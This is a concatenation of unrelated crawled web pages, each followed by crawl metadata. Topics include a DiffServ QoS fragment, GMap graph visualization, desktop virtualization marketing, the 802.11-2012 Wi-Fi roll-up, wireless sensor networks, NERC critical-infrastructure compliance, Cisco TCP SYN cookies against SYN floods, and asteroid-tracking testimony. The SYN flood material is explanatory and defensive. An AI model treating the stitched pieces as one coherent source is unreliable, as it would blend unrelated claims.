EF PHB provides a low-loss, low-latency, low-jitter, and assured bandwidth service. Applications such as VoIP, Video, and other time sensitive applications require a robust network treatment like EF. EF can be implemented using priority queuing, along with rate limiting for these time sensitive packets. EF should only be used for only the most critical applications. If congestion exists it is possible to treat too much traffic as EF and oversubscribe the queues anyway.
Class Selector – RFC 2474
Class Selector (CS) is used to provide for backward compatibility with IP Precedence. Just like IPP CS has 0s in the 4th, 5th and 6th bits of the TOS byte. For example, if you are sending packets to a router that only understands IPP markings you could send CS marked packets of 101000. This value is 40 in DSCP values but is interpreted as IPP 5 in the router that only understands IPP.
Subsequent posts in this series will look at the tool for implementing QoS and the command lines to build QoS on Cisco routers.
- End-To-End QoS network Design by Tim Szigeti and Christina Hattingh
- DiffServ – The Scalable End-To-End QoS Model
- Integrated Services Architecture
- Definition of the Differentiated Services Field
- An Architecture for Differentiated Services
- Requirements for IP Version 4 Routers
- An Expedited Forwarding PHB (Per-Hop Behavior)
Author: Paul Stryer | <urn:uuid:f92bb61e-eb28-43ac-83f2-e4ad5869c5a0> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/11/04/quality-of-service-part-3/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00116-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91206 | 1,956 | 2.515625 | 3 |
Mapping Preferences: A Harry Potter Topology
Clusters in a graph visualization are collections of closely related nodes that share many of the same links. Being able to easily see clusters is helpful for showing relationships. But clusters don't always stand out easily in a node-link graph, even when nodes are color-coded. Besides, many people are not familiar with the concept of a graph.
To better visualize graphs, a new algorithm, GMap, is being developed in Graphviz. It uses the geographic map metaphor, highlighting each cluster in a differently colored region (or country, to stay with the map metaphor). The borders of the cluster countries are drawn half way between two nodes. Nodes within a country are much more closely related than nodes in bordering countries. Compared with node-link graphs, maps are much more familiar and intuitive to people.
Showing clusters on a map is also an interesting way to present lists of preferences such as those that maintained by Netflix or Amazon to suggest other selections based on common preferences. But sometimes a simple list of recommendations can seem odd or counter-intuitive when the overlap between two selections isn't clear.
Visualizing and mapping recommendations can remove some of this mystery, showing how a recommendation is grouped with other choices. A map, much more than a simple list, can also lead a user's eye to other options and encourage the user to explore the landscape. | <urn:uuid:5d40b851-2507-47ca-a760-0f9b72ec5efa> | CC-MAIN-2017-04 | http://www.research.att.com/articles/featured_stories/2009/200910_harry_potter.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00510-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950339 | 284 | 3.1875 | 3 |
Desktop Virtualization for K-12 & Higher Education
Integrating technology into the classroom is an exciting endeavor which holds massive amounts of potential for students and teachers alike. Supporting BYOD and blended learning, incorporating in-person lessons with online lessons, providing chat and Web-enhanced lectures, and simply extending learning beyond the classroom into the Internet environment enables schools with the ability to deliver on their responsibility of giving students the confidence and skills to use and succeed with technology.
Achieving More with Less
Virtualization, a shared computing strategy that maximizes efficiency by harnessing the computing power of underutilized PCs is an excellent way to bring classrooms and labs into the 21st century, in a simple and cost effective manner. Simply stated, virtualization allows you to achieve more with less by simplifying management, allowing for blended learning and collaborative technology use and by facilitating incremental rollouts.
Key Benefits of Shared Computing
- Manages one virtual desktop OS for up to 100 end users, thereby reducing the number of operating systems to maintain by up to 97%.
- Reduces the per-seat cost of a PC by more than 75%.
- Integrates easily with your existing computing infrastructure, replacing costly PCs with simple, small and very durable thin clients.
- Centrally manages Internet filtering software, ensuring a consistent and safe Internet experience.
- Frees up valuable workspace in classrooms and labs.
- Produces less e-waste & utilize less energy.
- Qualifies for monies dedicated from Grants, e-Rate, Title 1 Funding, Municipal Bonds, ESEA Flexibility and energy rebates.
Real World Success
More than 30,000 schools in 140 countries have already discovered the benefits of NComputing virtual desktop solutions in classrooms, computer labs, libraries, testing centers, media centers, administrative offices, teacher desks and for digital signage. | <urn:uuid:d6b19e89-cac3-42b7-82ec-9967129a2c64> | CC-MAIN-2017-04 | https://www.ncomputing.com/en/solutions/education | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00326-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.904748 | 379 | 2.671875 | 3 |
Telecom Architectures and Information Technologies
Discover the intricacies of a new era in telecommunications.
Telecom is undergoing a series of radical changes, molded by the legacy of
telephony and an Internet Protocol network. A new era in telecommunications has
exploded with the adoption of Wireless LAN, Unified Communications (UC), Voice
over IP (VoIP), 3G and 4G mobile networks, cloud computing, and the next
generation of voice and data services.
In this comprehensive course, you will gain an in-depth understanding of the
current telecom landscape and how voice has migrated from a circuit- to a
packet-switched network. You will learn how to evaluate existing technology
options to determine which will best meet your organization's data and telephony
requirements, from mature digital transport/access services to emerging voice
and data services using voice over packet technologies.
The technology, marketplace, and regulatory structure of telecommunications
are in a continuous state of transition. This powerful course will ensure that
you fully understand the service options available to your organization and how
voice technologies integrate into your existing data networks. | <urn:uuid:b94f6519-a80d-47e0-b561-0e731bfc1b7e> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/115798/telecom-architectures-and-information-technologies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00262-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.868907 | 230 | 2.953125 | 3 |
Even though users typically only notice the major changes designed to improve the performance of Wi-Fi, the 802.11 specifications are constantly under development. For every "public" change there are five background changes, some of which are significant.
With more than 20 802.11 specifications already ratified and many more in development, it makes sense to occasionally "roll up" the changes. Many of these protocols, after all, can cause functional overlap and need extra attention to become interoperable. 802.11-2012 incorporates 10 recently ratified 802.11 amendments into an overall 802.11 spec, making it easier for engineers working with 802.11 to find what they need, say nothing of the fact that it also helps alleviate interoperability issues between protocols.
Here are the 10 specs that are part of this roll-up, including the year they were ratified and a brief description of each:
* 802.11k: Radio Resource Measurement Enhancements (2008). Mainly used by AP manufacturers, this amendment makes additional radio and network information available to WLAN devices. This information is used to make real-time decisions about WLAN management, typically for better load balancing. [Also see: "Latest 802.11 standards: Too little too late?"]
The specification provides mechanisms for the AP or the central WLAN controller to offload users to another AP, even if the new AP has weaker signal strength than the impacted one. This could lead to signal strength and connectivity issues for WLAN users, so this needs to be considered when performing WLAN analysis of systems utilizing 802.11k.
WLAN systems designed for stadiums, auditoriums and large lecture halls will benefit from this specification. Usage in these settings is typically very dense, requiring careful WLAN bandwidth and user management, and 11k will provide the necessary data and control for managed WLAN equipment to handle these sporadically dense environments.
* 802.11n: Higher Throughput Improvements Using MIMO (September 2009). Just about everyone is familiar with 802.11n. The key technology introduced in this specific is MIMO (multiple input, multiple output), which allows for the simultaneous transmission of multiple unique data streams to significantly increase overall throughput.
802.11n is quickly becoming the de facto standard for commercially available WLAN equipment. The new technologies it introduced are very advanced, and it's unlikely that the full potential that 11n offers will be delivered to the market due to some practical limitations. However, the lessons learned from these limitations are quickly being addressed with new 802.11 specifications, most notably 802.11ac.
* 802.11p: WAVE -- Wireless Access for the Vehicular Environment (July 2010). 802.11p deals with data exchange between high-speed vehicles, and between vehicles and a yet-to-exist roadside WLAN infrastructure based on licensed spectrum in the 5.85-5.925GHz band. Activity in this area has been quite limited to date, as the overall implementation is complex, expensive and requires the appropriate business model if it's ever to see the light of day.
This specification provides a great example of how different specifications need to work in concert. Imagine driving down the freeway at 65 mph. Given the range of a typical access point is several hundred feet, your client will need to roam from one AP to the next every 5 seconds or so. The specific application of 11p can take advantage of certain techniques, like beamforming and increased power to perhaps extend the available range of each AP, but the amount of time spent connected to each AP will still be in the range of tens of seconds. [802.11p issues: "Will electronic toll systems become terrorist targets?"]
If a user is only going to be on an AP for approximately 15 seconds before being handed off to the next, the handoff time needs to be very short to provide a seamless user experience. Handoff is specifically addressed in 802.11r, also part of the 802.11-2012 roll-up, so it's imperative that the capabilities defined in both specifications be consistent and interoperable.
* 802.11r: Fast BSS Transition (2008). As more amendments have been added to 802.11, the time it takes to make a "transition" or "handoff" when moving from AP to AP has degraded significantly, causing problems for services like voice over Wi-Fi (VoFi). This amendment addresses this degradation, returning the handoff process to the simple 4-message exchange as originally designed.
Technology based on 11r is already actively in use, and will become much more common in enterprise WLAN equipment. Even if customers aren't yet utilizing their WLAN for voice or video, they'll want to plan for the future as more and more client equipment (smartphones and tablets) are shipped ready for handoff from cellular networks to WLANs.
* 802.11s: Mesh Networking, Extended Service Set (July 2011). Mesh networking specifies an architecture and protocol to create self-configuring multi-hop wireless networks. These are typically high-performing, scalable, ad hoc networks, often with no wired access at all. Proprietary mesh technology has been in use for years, mainly in the public service/emergency management space where ad hoc local networks need to be set up in an area with little or no wired infrastructure -- basically temporary field networks. 802.11s will help tremendously in standardizing this technology, making it more interoperable and more accessible to wider business applications.
* 802.11u: Interworking with Non-802 Networks (February 2011). This is an extremely hot topic in mobile computing, and one that will continue to get tremendous attention. It also requires solutions to solve some pretty difficult practical problems, including discovery, authentication, authorization and compatibility, across multiple technologies and multiple service providers, hence the delivery of compatible products has been slower than anticipated.
Transition for data delivery is easier and is already fairly widespread. Most smartphones transition automatically from the cellular data network to an 802.11 network once users come into range of a network that has already been configured. Transitioning active telephone calls is much more complicated and much less common, but the need and the desire for products to do so is apparent and it is just a matter of time.
802.11u also provides key technology that enables the Wi-Fi Alliance Passpoint certification program (a.k.a. Hotspot 2.0). This program allows for the seamless transition of Wi-Fi clients between any hotspot AP that is certified to be Passpoint compliant, eliminating many of the complexities that exist today in discovering and connecting to both public and carrier-sponsored hot spots. Look for 802.11u, and Passpoint compliant, hardware to be hitting the market very soon. [Also see: "802.11u and Hotspot 2.0 promise Wi-Fi users a cellular-like experience"]
* 802.11v: Wireless Network Management (February 2011). 802.11v provides a mechanism for wireless clients to share information about the WLAN environment with each other and APs to improve WLAN network performance in real time. This specification is relatively new, and manufacturers are just beginning to take advantage of some of its features. As WLANs become even more heavily utilized, the benefits of 802.11v will certainly become obvious.
* 802.11w: Protected Management Frames (September 2009). 802.11w specifies methods to increase the security of 802.11 management frames. Management frames are 802.11 packets that control communication on the WLAN, but do not contain data. Currently, management frames are sent "in the clear." This makes them potentially vulnerable to malicious manipulation and can lead to a wide variety of WLAN attacks, from client spoofing (a rogue pretending to be an approved user) to hijacking of all data destined for one or more APs. 802.11w will significantly reduce these risks.
* 802.11y: 3650-3700MHz Operation in the U.S. (2008). 802.11y specifies a "light-licensing" scheme for U.S. users to take advantage of spectrum in the 3650-3700MHz band, at power levels that are significantly higher than those used in the 2.4GHz or 5GHz bands. The use case for this technology will typically be for longer distance, point-to-point, backhaul communication using 802.11, for example fixed point-to-point mobile links that may be required in a large-scale, temporary wireless network (like in an emergency situation), wireless interconnectivity between buildings in a campus setting, or links between islands of 802.11 hotspots in a municipal environment.
* 802.11z: Extensions to Direct Link Setup (September 2010). Direct link setup (DLS) allows WLAN client devices to connect directly to each other, bypassing the typical link through an infrastructure AP. This has many benefits, including an increase in speed (between the clients), an increase in network throughput (for all users), and an increase in overall service delivery, especially for multimedia (like a computer to DVR connection or a laptop to projector connection). [Also see: "Wi-Fi Alliance starts certifying tunnel technology for better wireless performance"]
The Wi-Fi Alliance (WFA) already has a program in place called Wi-Fi Direct that addresses this functionality, and most commercial devices are being certified under this program. 802.11z standardizes this behavior, making it easier for equipment designers to ensure their products can deliver popular features like Wi-Fi Direct.
The recently ratified 802.11-2012 specification is most certainly a wide-ranging roll-up. From generic and already prolific technology like 802.11n to highly specific technology like 802.11y, this new specification integrates all current Wi-Fi technology into a single specification again, making it easier for developers and testers to find all the information they need in a single document. And although the ratification of such a specification may seem trivial to end users of this technology, they will also benefit, both from tighter feature integration as well as faster time to market for interoperable 802.11 devices.
WildPackets develops hardware and software solutions that drive network performance, enabling organizations of all sizes to analyze, troubleshoot, optimize and secure their wired and wireless networks. Customers include Boeing, Chrysler, Motorola, Nationwide, and over 80 percent of the Fortune 1000. WildPackets is a Cisco Technical Development Partner (CTDP). For more information, visit www.wildpackets.com. | <urn:uuid:a8d9f483-accf-4df1-9e42-3d8e0f935ec0> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2161855/tech-primers/rolling-up-developments-in-wi-fi.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00410-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934742 | 2,165 | 2.96875 | 3 |
Meanwhile, the discussion also broke down to the benefits of functional programming versus imperative programming. Functional programming is a programming paradigm that treats computation as the evaluation of mathematical functions and avoids state and mutable data. It emphasizes the application of functions, in contrast to the imperative programming style, which emphasizes changes in state. The difference between a mathematical function and the notion of a "function" used in imperative programming is that imperative functions can have side effects, changing the value of program state. A key tenet of functional programming is the concept of immutability. In functional programming, an immutable object is an object whose state cannot be modified after it is created. | <urn:uuid:a7387d5d-00f2-4c24-bb00-2f53ed104f23> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Application-Development/Is-it-Time-for-JavaScript-to-Step-Aside-for-the-Next-Big-Web-Thing-109707/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947482 | 130 | 3.6875 | 4 |
Wireless Sensor Networks: Structure and Protocol
A problem with any discussion around wireless sensor networks is that—like so many other bleeding-edge technologies—few people can say with certainty what they really are. Of course, this doesn’t mean people will be discouraged from attempting to use them. In fact, for many of the experts who work with wireless, this is a very exciting stage of development, one rife with opportunities for innovation.
“Currently, wireless sensor networks are generally considered to be at their infancy,” said Seapahn Megerian, a specialist in networked embedded systems and assistant professor in the Electrical and Computer Engineering Department at the University of Wisconsin in Madison. “This means that although you are not very likely to see them being used around you right now, there is a very strong impetus in terms of academic research and industrial support that will undoubtedly change this in the near future. The beauty of forward-looking academic research in a new area such as this is that you are typically not constrained by existing standards and guiding entities. But on the down side, this leads to contributions and results that often cannot be made to coexist without significant efforts. I would say a large number of the challenges now—both in academia as well as industry—deal with trying to come to a consensus on what a ‘sensor network’ is and what the applications are.”
A rough explanation of the structure of wireless sensor networks would simply be an arrangement of RF transceivers, sensors, machine controllers, microcontrollers and user interface devices that communicate with each other via two or more nodes. However, this description leaves something to be desired and doesn’t really explain how these interrelate, nor could it. “Wireless sensor networks define a truly vast multidisciplinary domain that encompasses technologies starting from the physics and device levels to circuits, embedded processors, storage, wireless communication, networking, system integration, middleware, operating systems, security and application software. Consequently, a large number of guiding entities can potentially come in play when all of these components are brought together to form a functioning system,” Megerian said.
Likewise, it’s not easy to pin down universal protocols and best practices for wireless sensor networks. In this way, this sphere is similar to wireless technology in general. “There are a number of existing standards, new and emerging standards, and guiding principles for each of the components that make up sensor networks.” Megerian explained. “Many of these areas are quite mature and have been studied in-depth in the past decades. At the same time, there are also a number of newer general principles that have started to guide the research in the area of sensor networks. Various consortia are emerging to try to bring some order, but exactly how this will evolve in the future is unclear.”
Two of the main identified problems with the operation of wireless sensor networks are constraints in the energy that powers the nodes, Megerian said. Generally, these nodes, which can number in the thousands, are battery-operated. Because they often monitor austere and inaccessible locations and there are so many of them, the people using them today have to adopt a kind of “spray-and-pray” approach. “Generally, we do not assume that individual sensor nodes will be reliable. Thus, the common algorithms and protocols of sensor networks often have features to automatically recover from node failures, either due to energy exhaustion, hardware failures or other unforeseen events. Furthermore, the performance of the wireless communication links between the sensor nodes may be quite unpredictable. This adds another dimension of uncertainty in how we design, maintain, troubleshoot and fix wireless sensor networks.”
Megerian used a somewhat transcendental description to explain wireless sensor networks and their (for now) latent capabilities. “I think it helps to think of wireless sensor networks as the missing link between our informational (computational) worlds and our physical reality,” he said. “Sensor networks enable us to see and learn things in our daily environments in ways and at granularities that have never been possible before. Virtually all scientific branches can now have access to the kinds of data that are fundamental in making significant experimental advances in our understanding of the world. These advances will then undoubtedly lead to further, and potentially profound, theoretical advances, much like we have seen in the past: the synergy between experimental and theoretical progress and how one almost always seems to feed off of the other.
“But along with this newfound power to observe come a number of pitfalls that will definitely need to be addressed,” he added. “First and foremost, privacy issues stand out any time sensors are placed in any way that can observe human activities. Furthermore, security and protection of the information presents a number of non-trivial challenges. Sensor nodes in such system are, by design, exposed to a wide array of elements that can include eavesdroppers, malicious attackers and hackers.”
But will there ever be a substantial market for wireless sensor networks? In Megerian’s opinion, almost certainly yes. The watchword for this sector is “potential,” he said. The applications of these systems in the future could include monitoring of houses and offices, observation of the environment for advanced warnings of natural disasters, military surveillance and even exploration of the planets and moons in our solar system. “Basically, with sensor networks, the technologies have been advancing at a much faster pace than the applications and the potential users have. So given time, it seems quite likely that the applications (and the potential users) will catch up and wireless sensor networks will find their way in all sorts of public, consumer, commercial and other environments.”
–Brian Summerfield, firstname.lastname@example.org | <urn:uuid:a0026118-8349-431b-b53f-450a34ef21a1> | CC-MAIN-2017-04 | http://certmag.com/wireless-sensor-networks-structure-and-protocol/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00557-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952625 | 1,201 | 2.890625 | 3 |
Get Instant Access
To unlock the full content, please fill out our simple form and receive instant access.
Business Process Analysis, also known as Business Process Mapping, is a systematic way of representing tasks, activities, procedures, employees, timeframes, inputs, and outputs associated with a specific business process in a flowchart-style diagram. Fundamentally, it offers a graphical representation of how an organization's processes operate. This template will assist in the gathering of information during the initial phases of the BPA process. | <urn:uuid:b5608acf-05a5-4f62-8515-868bb75e1b26> | CC-MAIN-2017-04 | https://www.infotech.com/research/process-profile-template | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00281-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90229 | 105 | 2.6875 | 3 |
Apart from one another, information technology (IT) and operational technology (OT) are two separate entities that perform different functions. But together, they make up the backbone of a nation’s security and economic stability—both in the private and public sectors. Governments, utility companies and transportation departments must ensure, at all costs, that critical infrastructure protection is not compromised. And this means that several challenges must be addressed.
According to the U.S. Department of Homeland Security, critical infrastructure is comprised of the networks, systems and assets—both virtual and physical—that are so vital that their incapacitation would compromise security, health and safety. There are a lot of challenges involved in the maintenance of such infrastructure; so with so much at stake, providers must protect both IT and OT systems to develop a robust critical infrastructure protection solution.
One of the main differences between IT and OT infrastructure is that IT systems can be replaced. A server or PC, for instance, can be easily fixed or replaced and likely will not pose a threat to human life if destroyed. But when OT systems are compromised, the effects can be devastating. This is because OT infrastructure manages systems such as power grids and gas lines. It is the difference between a loss of information and potential loss of life. And it is often the difference between a common technology mishap and a potential attack from paramilitary threats, foreign governments or terrorist organizations.
In this regard, it is important to prevent the collapse of critical infrastructure. Attacks or threats from both known and unknown enemies or organizations continue to be the main threats to operational safety. Thus, the North American Electric Reliability Corporation (NERC) provides strict guidelines for compliance. Aside from the physical risks associated with compliance failures, organizations that do not adhere to guidelines can face penalties of up to $1 million—each day.
NERC compliance involves a complete facility assessment, and mandates that each organization develop and maintain a list of critical cyber assets (CCA) that are essential to that facility’s main operation. Further, Critical Infrastructure Protection (CIP) standards are designed to ensure that each network is segmented for the purpose of isolating attacks to individual sectors in hopes of preventing its spread.
Further challenges associated with NERC compliance include mandatory password changes, including random-character generation and the issuance of digital certificates to computers, servers and mobile devices. This is for the purpose of ensuring that only authorized devices can connect to a network. While past solutions such as personal identification numbers (PIN) and biometrics have been utilized, these are now only preliminary security measures and must be backed up with digital certificates to verify employee credentials. Strong authentication of the individual identity accessing operation and information systems is crucial, including remote, physical and logical access.
For more information on how you can protect your critical infrastructure from malicious activity, please click here. | <urn:uuid:34ae16b2-c437-4fd0-a066-4639d207cdf7> | CC-MAIN-2017-04 | https://www.entrust.com/deploying-a-critical-infrastructure-protection-solution-with-ot-and-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00035-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940783 | 576 | 2.796875 | 3 |
Many students who have either taken training classes on the Cisco PIX or ASA security appliances or read associated published material are already acquainted with the phrase “TCP SYN cookie”. This post will serve to explain some of the historical background, as well as the numerous hardware implementations.
The TCP SYN Flood denial-of-service attack is now more than fifteen years old. Kevin Mitnick used it as part of his now-famous coordinated attack against his future prosecutor, Tsutomu Shimomura. A little more than five years later, SYN floods played a part in the Distributed Denial of Service (DDoS) attacks that brought down Yahoo, eBay, CNN, and others. Now SYN flood scripts and executables are freely available for download (more details here and here).
An early Cisco IOS® Firewall implementation utilized a feature known as TCP Intercept which could be operated in either monitor or intercept modes. These would either report excessive TCP SYN activity via syslog, or prevent it entirely. The drawback of this approach was its use of a memory-resident TCP state table, which, during peak periods of flooding, could result in depleted router resources. So while attackers might be thwarted in their efforts to bring down servers, they might bring down the router instead!
In the mid-1990’s a variety of proposals were put forth in an attempt to provide a more effective TCP SYN flood defence mechanism. Among these is the TCP SYN Cookie mechanism offered by Daniel J. Bernstein and briefly diagrammed here:
TCB (Transmission Control Block) referenced above is a data structure which holds the connection state information and can be several hundred bytes in size depending on the implementation in the operating system. What the SYN Cookie mechanism does is to encode information that would normally be kept in the memory resident TCB in the Initial Sequence Number (or cookie as in the diagram above) returned in the SYN-ACK.
The acknowledgement (ACK) from the Initiator (or client) to this sequence number can be decremented by one to confirm the state information for this client. Note that this encoding scheme allows the Listener (or server) to purge any connection state table as indicated by the destruction of the TCB above.
TCP SYN Cookies are not only available on the ASA and PIX firewalls (first introduced in PIX OS 6.2), but also on the 12000 series routers supporting the Cisco IOS XR software as well as the Application Control Engine (ACE) 4700 series. | <urn:uuid:467d1461-3391-4d0f-ae15-7ea7c2f68895> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2010/12/20/implementing-tcp-syn-cookies-on-cisco-hardware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280128.70/warc/CC-MAIN-20170116095120-00521-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952289 | 521 | 2.625 | 3 |
There has been much chatter about the threat of an asteroid or significant meteor strike on Earth in the past few weeks - mostly caused by the untracked meteor that blasted its way to international attention when it exploded in the sky above Russia injuring nearly 1,200 people in February.
It was one of those amazing coincidences that on that same day an asteroid NASA had been tracking for months -- asteroid 2012 DA14 - was to harmlessly cross Earth's path.
[RELATED: The sizzling world of asteroids]
The events of that day in particular play up the difficulty of tracking such objects. It also demonstrated the significance or perhaps insignificance of spending tons of money and developing new technologies to tracking such objects.
Those events and the topic of mitigating asteroid and meteor or Near Earth Object threats to Earth prompted a couple congressional hearings by the Committee on Science, Space, and Technology, the latest of which was held this week.
"Because it was found a year in advance, we were able to accurately predict the close Earth passage of asteroid 2012 DA14 on February 15, and we knew that it would not hit the Earth. However, the small asteroid that impacted the Earth's atmosphere over Russia arrived unannounced because it came from the direction of the Sun, and was hence unobservable with Earth-based telescopes. Discovering and identifying relatively small Earth impactors among the millions of asteroids in the Earth's neighborhood represents a significant challenge. Because there are so many more smaller asteroids than larger ones, the smaller ones hit the Earth's atmosphere more frequently. There are about ten million 20-meter sized asteroids like the one that exploded over central Russia two months ago, and their frequency of collision with the Earth is about once every 100 years, on average," Donald Yeomans, manager of the Near-Earth Object Program Office at NASA's Jet Propulsion Laboratory.
Yeomans went on to say that the NASA-supported NEO observations program is proceeding extremely well, and the rate with which NEOs are being discovered and physically characterized is increasing each year.
"[In] 2007, about 80% of the NEOs one kilometer or larger had been discovered and only a few percent of the smaller 140 meter objects. Today, the Spaceguard goal of discovering 90% of the large NEOs has been exceeded and about 25% of the 140 meter or larger sized NEO population has been discovered. Today, the discovery rate of NEOs is about 1000 per year, up 50% since 2007. The Minor Planet Center in Cambridge, Massachusetts, has 100 million observations of NEOs in its database and 27,000 observations are added daily. Fully 96% of all NEOs were discovered by NASA-funded surveys," he stated. Still there is still much work to be done. About 50-100 NEOs larger than one kilometer remain undiscovered, along with about 13,000 NEOs larger than 140 meters and millions of objects larger than about 30 meters in extent - the approximate minimum size for a common stony asteroid to cause significant ground damage.
"None of the NEOs found to date have more than a tiny chance of hitting Earth in the next century. Thus the near-term risk of an unwarned impact from large asteroids, and hence the majority of the risk from all NEOs, has been reduced by more than 90%. Assuming none are found to be an impact threat, discovering 90% of the 140 meter sized objects will further reduce the total risk to the 99% level. By finding these objects early enough and tracking their motions over the next 100 years, even those rare objects that might be found threatening could be deflected using existing technologies. For example, a spacecraft could purposely ram the asteroid, modifying its orbital velocity by a very small amount, so that over several years its trajectory would be modified and its predicted impact of Earth in the future avoided by a safe margin," Yeomans said.
There are viable options for accelerating the current NEO search efficiencies either using next-generation, ground-based optical surveys or the even more efficient space-based infrared surveys.
Yeomans detailed some future technologies that will help with space objection identification.
- The existing Pan-STARRS1 (PS1) system operates a 1.8-meter aperture telescope on the island of Maui but this instrument only focuses its attention on NEO observations for about 11% of its observing time because of other science objectives. Even so, PS1 currently provides about 25% of the NEO discoveries, second only to the Catalina Sky Survey. Suitable funding to increase the percentage of time devoted to NEO searches on Pan-STARRS1, at the expense of other science, would accelerate the current NEO discovery rate, as would the full time or part time use of a second Pan-STARRS2 telescope that is nearing completion adjacent to the Pan-STARRS1 facility on Maui.
- An important planned future contributor is the Space Surveillance Telescope (SST), a 3.5-meter wide-field telescope that is being developed by MIT's Lincoln Laboratory for DARPA and the US Air Force. When fully operational in late 2014, this telescope will scan a wide region centered on the equatorial band of the night-time sky. Investigations are ongoing to better understand the efficiency with which this telescope will discover NEOs and what sort of scheduling might be intermingled with its prime mission of manmade space object surveillance to carry out these NEO observations.
- The most effective, ground-based NEO detection telescope that is currently in planned development is the Large Synoptic Survey Telescope (LSST), a 8.4-meter aperture, widefield telescope that is planned to begin operations in Chile in the early 2020s. To be funded by the National Science Foundation and a consortia of private and international agencies and universities for a variety of science programs, simulations have suggested that the shared use of LSST could catalog approximately 25% of the 140 meter sized NEOs within 5 years of operations and about 45% in ten years.
- Especially for the population of undiscovered sub-kilometer sized objects, space-based infrared telescopes would be a more efficient discovery system than the current ground-based optical surveys. This is because asteroids emit considerable heat, not just reflected sunlight, and this heat makes them bright in the infrared wavelengths, but these wavelengths are also unfortunately heavily filtered by the Earth's atmosphere. In addition, the view from an observatory orbiting the Sun interior to the Earth's orbit would have far better viewing coverage of hazardous objects farther away from Earth.
- Furthermore, a space-based telescope would not have to deal with downtime due to weather and daylight. Ground-based telescopes have difficulty distinguishing a large, dark asteroid from a small, bright asteroid, often making asteroid size measurements very uncertain. On the other hand, space-based infrared measurements can infer an asteroid's size with an uncertainty of only about 10% and its reflectivity to about 20%.
- The NASA-funded ground-based ATLAS system currently under development at the University of Hawaii is a relatively low cost, wide-field telescopic survey designed to patrol the entire accessible night sky every night to provide suitable impact warnings for small asteroids on near-term Earth impacting trajectories. Simulations suggest that the ATLAS system, consisting of 3 to 4 sites worldwide, will find almost all objects larger than 30 meters coming at us from the night sky and provide a week's warning time. Current search programs are designed to find larger potentially hazardous objects well in advance of a predicted impact so that existing technologies (e.g., spacecraft rendezvous and impacts) could be employed to deflect the object out of harm's way.
- A space-based infrared telescope in either a Venus-like orbit or interior to the Earth on the Sun-Earth line would be far more efficient finding NEOs than would existing, or planned, ground-based optical surveys. For the more numerous population of smaller NEOs that can still do significant ground damage, an infrared telescope in that location would be well positioned to find those smaller objects making close Earth approaches. A successful space-based IR survey telescope in a Venus-like orbit would be very effective in discovering NEOs further in advance and providing positional observations unavailable from Earth-based telescopes. Together these observations would allow a faster refinement of an asteroid's orbit so that impact predictions could also be updated more quickly. Hence these space-based observations might provide an early "all clear" and avoid otherwise unnecessary concern and unneeded deflection mission planning or initiation.
Such a telescope is in fact being developed by a privately held group called the B612 Foundation. Ed Lu, CEO of the B612 Foundation testified the group is philanthropically funded and in the process of building what it calls the Sentinel Space Telescope which it intends to launch by 2018.
Lu said the group's prime contractor is Ball Aerospace, located in Boulder, CO. Ball has previously built the Kepler Space Telescope, and the Spitzer Infrared Space Telescope on which Sentinel is largely based. We do have some non-financial support from NASA, which is providing use of the antennas of the Deep Space Network for telemetry and tracking, in addition to some technical consulting.
"Sentinel will orbit the Sun interior to the Earth, in a solar orbit similar to that of the planet Venus. From that vantage point, Sentinel will be able to continuously look outwards away from the Sun while scanning Earth's orbit. This vantage point combined with Sentinel's ability to track asteroids from greater distances, means that Sentinel will typically be able to track an individual asteroid for several months at a time, which allows the orbit of that asteroid to be determined accurately. This is critical because many asteroids will have orbits which at first may appear to pose a threat to Earth until further observations can be used to refine our knowledge of the asteroid orbit well enough to rule out an impact. This is problem for telescopes located on or near Earth, as many asteroids can only be observed for a few weeks and then cannot be observed for long periods of time (often many years) because these asteroids recede in their orbits to the other side of the Sun for extended periods.
Sentinel will orbit the Sun every 8 months, and so it will be able to observed and track these asteroids much more frequently, and therefore will be able to refine the orbits of such asteroids much faster. This will reduce incidences of asteroids having long periods of uncertainty such as we witnessed for the asteroid Apophis from 2004 until about 2010 (when our data was insufficient to be able to rule out an impact with Earth)," Lu stated.
Yeoman's concluded: "For the millions of small NEOs, in the range of 30 to 50 meters, it would be extremely challenging to find the majority of this population far enough in advance to first determine which ones represent a threat and then deflect them safely away from Earth. And meeting such a challenge may not be cost effective. It may be sufficient to simply detect these small asteroids a few days or weeks prior to Earth impact so that appropriate warnings could be made and evacuations undertaken similar to hurricane emergencies in the unlikely case where populated areas of Earth would be threatened. A warning of this type would also assure affected nations that the coming explosive blast would be a natural phenomena rather than a hostile act. One of the issues with which policy makers will need to wrestle is where to draw the line as to the minimum NEO size that represents so large a threat as to require deflection attempts. Objects below that limit would then require only advance warning. Cost benefit studies would shed some light on this issue."
